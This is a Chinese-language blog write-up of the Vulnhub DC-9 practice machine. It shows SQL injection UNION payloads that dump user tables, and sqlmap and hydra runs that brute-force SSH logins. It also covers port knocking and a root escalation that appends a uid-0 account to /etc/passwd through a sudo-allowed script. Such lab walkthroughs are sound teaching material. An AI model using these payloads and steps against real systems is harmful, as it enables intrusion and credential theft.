首页 > 其他分享 >Vulnhub DC-9靶场WriteUP

Vulnhub DC-9靶场WriteUP

时间:2023-03-05 21:01:29浏览次数:48  
标签:WriteUP DC 192.168 dc Vulnhub kali test 244.135 janitor

Recon

  首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

  随后使用Nmap对靶机进行扫描,发现22端口被过滤,80端口开启。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Sql Inject

  尝试访问Web服务。

  在Search部分测试SQL注入。

  使用order by猜测列数,得出返回6列数据。

  通过union select获得列数。

  获取数据库名和当前数据库版本。

  获得当前数据库中存在的表名。```

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

  查看表的字段名,

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#

  获得用户名和密码Hash后,对Hash进行破解,然后在Web界面登录。
用户名密码为:admin:transorbital1

  通过Manage界面的File does not exist,我们猜测文件包含漏洞。通过BurpSuite进行爆破尝试。

这里需要注意,发送请求时不能URL编码Payload。

  接下来的我们获得了用户名,但是SSH端口并没有开启,在/etc下我们发现了/etc/knockd.conf,Knockd保护了SSH端口的开启与关闭,根据Knockd的配置,我们只有按顺序访问指定端口,才能开启SSH端口。

  根据配置文件我们可知,按顺序访问7469,8475,9842端口可以打开SSH端口。我们可以用nc或nmap来Knock。

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Brute

  我们现在已经开了SSH端口,但我们没有SSH的用户名与密码,我们尝试sqlmap,将数据库的内容导出,尝试爆破SSH用户和密码。我们首先将注入点的HTTP请求内容保存至文件。

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

  然后使用如下命令导出表中内容。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump  
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

  随即处理文件内容然后进行爆破。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst  

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

  获得密码后,我们尝试登录提权。三个账户都没有sudo权限,但janitor用户目录下有隐藏文件。

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

  我们使用这些密码再次进行爆破。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27

  查看sudo -l权限。

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

  进入到该可执行文件的上层目录查看test.py的源码。

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

  通过分析源码,我们知道该程序接收三个参数,读取第二个参数并写入第三个参数,那么我们就可以构造一个拥有root权限的用户写入/etc/passwd文件中,从而提权。我们首先通过程序读取shadow文件的内容,获得一个我们已知密码的用户。

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

  我们修改这条内容为如下内容。并保存在/tmp/test下。
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

  然后通过test程序进行写入(请使用单引号),并su提权(这里要提交janitor的密码)。

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

  提权后成功获得FLAG。

标签:WriteUP,DC,192.168,dc,Vulnhub,kali,test,244.135,janitor
From: https://www.cnblogs.com/RichardLuo/p/DC-9-WP.html

相关文章

  • tailwindcss_封装
    /admin-one-vue-tailwind-master/index.html<!DOCTYPEhtml><htmllang="zh"><head><metacharset="utf-8"><metahttp-equiv="X-UA-Compatible"content="IE=ed......
  • Vulnhub:Seppuku靶机
    kali:192.168.111.111靶机:192.168.111.212信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.212对samba服务进行枚举发现三个系统用户enum4......
  • Vulnhub之UnInvited靶机测试过程
    UnInvited识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/UnInvited]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|Screen......
  • tailwindcss封装一个按钮
    templatetag<template><button:class="classes"><slot:iconSizeClasses="iconSizeClasses"/></button></template>scripttag<scriptsetup>......
  • ContentProvider+BroadCast的使用
    内容提供者的官方定义如下:  首先是ContentProvider的使用,翻译成中文就是内容提供者,作用就是比如我在从微信往qq传一张图片,我需要一个内容提供者,这里我的微信里面的图......
  • Vulnhub:Five86-2靶机
    kali:192.168.111.111靶机:192.168.111.211信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.211wpscan收集目标wordpress用户wpscan--url......
  • Vulnhub之View2akill靶机测试过程(部分)
    View2akill识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|......
  • vulnhub靶场之MATRIX-BREAKOUT: 2 MORPHEUS
    准备:攻击机:虚拟机kali、本机win10。靶机:Matrix-Breakout:2Morpheus,下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova,下载后直接......
  • m基于DCAR编码感知的网络路由发现算法matlab仿真
    1.算法描述1.路由请求过程        当一个源节点有数据要向目的节点发送且在当前路由缓存中未发现可用路径时,则启动路由请求过程,下面分步对该过程进行说明: 步......
  • LeedCode 85. 最大矩形(/)
    原题解题目约束题解解法一classSolution{public:intmaximalRectangle(vector<vector<char>>&matrix){intm=matrix.size();if......